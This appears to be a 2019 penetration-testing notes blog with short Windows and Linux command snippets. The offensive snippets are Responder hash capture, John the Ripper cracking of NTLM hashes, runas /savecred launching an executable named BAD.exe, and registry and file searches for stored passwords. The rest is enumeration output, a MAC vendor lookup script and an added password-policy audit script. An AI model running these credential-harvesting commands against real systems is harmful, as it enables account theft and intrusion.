Tuesday, October 22, 2019

Sample Responder command

responder -I eth0 -r -b

cd /usr/share/responder/logs

john --format=netntlm SMB-NTLMv1-SSP-9.9.9.9.txt --wordlist=/usr/share/wordlists/rockyou.txt

john --format=netntlmv2 SMB-NTLMv2-SSP-8.8.8.8.txt --wordlist=/usr/share/wordlists/rockyou.txt

Friday, October 18, 2019

Print all MAC Address Vendors around you (arp -a)

# Print all MAC address vendors around you (using the ARP table and this great
# Python library: https://pypi.org/project/mac-vendor-lookup/ )

import os
from mac_vendor_lookup import MacLookup

# Build the lookup object once so the vendor database is loaded a single time
lookup = MacLookup()

arp_output = os.popen("arp -a").read()
print(arp_output)
for line in arp_output.splitlines():
    for item in line.split():
        # Windows "arp -a" prints MACs as xx-xx-xx-xx-xx-xx; skip the "---" separators
        if "-" in item and "--" not in item:
            try:
                print(item + ": " + lookup.lookup(item))
            except Exception:
                print(item + ": not found")

View Stored Credentials and Runas

>cmdkey /list

Currently stored credentials:

....

runas /savecred /user:XXXX "c:\BAD.exe"

Search inside Windows Files for passwords

>findstr /s password c:\*.ps1

Password Searching in Registry

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S

REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S


Get File Shares Exposed "net share"

>net share

Share name   Resource                        Remark

-------------------------------------------------------------------------------
C$           C:\                             Default share
IPC$                                         Remote IPC
print$       C:\WINDOWS\system32\spool\drivers
                                             Printer Drivers
ADMIN$       C:\WINDOWS                      Remote Admin

Password Login Settings "net accounts"

>net accounts
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          30
Minimum password length:                              15
Length of password history maintained:                12
Lockout threshold:                                    3
Lockout duration (minutes):                           45
Lockout observation window (minutes):                 45
Computer role:                                        WORKSTATION
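An added example (not part of the original post) that parses the `net accounts` output above and flags lockout and password settings that fall outside a baseline; SAMPLE_NET_ACCOUNTS is the post's own output, while BASELINE is an assumed, illustrative policy rather than anything the post states:

```python
# Added example (not from the post): audit what `net accounts` prints against
# an assumed baseline. SAMPLE_NET_ACCOUNTS is the post's output; BASELINE is illustrative.
SAMPLE_NET_ACCOUNTS = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          30
Minimum password length:                              15
Length of password history maintained:                12
Lockout threshold:                                    3
Lockout duration (minutes):                           45
Lockout observation window (minutes):                 45
Computer role:                                        WORKSTATION
"""

# Assumed baseline (not from the post): label -> ("min" or "max", limit)
BASELINE = {
    "Minimum password age (days)": ("min", 1),
    "Minimum password length": ("min", 14),
    "Maximum password age (days)": ("max", 90),
    "Length of password history maintained": ("min", 24),
    "Lockout threshold": ("max", 10),
    "Lockout duration (minutes)": ("min", 15),
    "Lockout observation window (minutes)": ("min", 15),
}

def parse_net_accounts(text):
    """Map each 'Label:   value' line to a dict; numeric values become ints."""
    settings = {}
    for line in text.splitlines():
        label, sep, value = line.partition(":")
        if not sep:
            continue  # not a setting line
        value = value.strip()
        settings[label.strip()] = int(value) if value.isdigit() else value
    return settings

def audit_net_accounts(text, baseline=BASELINE):
    """Return (label, actual, requirement) for every setting outside the baseline."""
    settings = parse_net_accounts(text)
    findings = []
    for label, (kind, limit) in baseline.items():
        actual = settings.get(label)
        requirement = (">=" if kind == "min" else "<=") + " " + str(limit)
        # "Never" (e.g. lockout disabled) or a missing line never satisfies a numeric bound
        if not isinstance(actual, int):
            findings.append((label, actual, requirement))
        elif (kind == "min" and actual < limit) or (kind == "max" and actual > limit):
            findings.append((label, actual, requirement))
    return findings
```

Against the sample output this reports the 0-day minimum password age and the 12-entry password history as below baseline; a "Never" lockout threshold is reported as a finding rather than silently skipped.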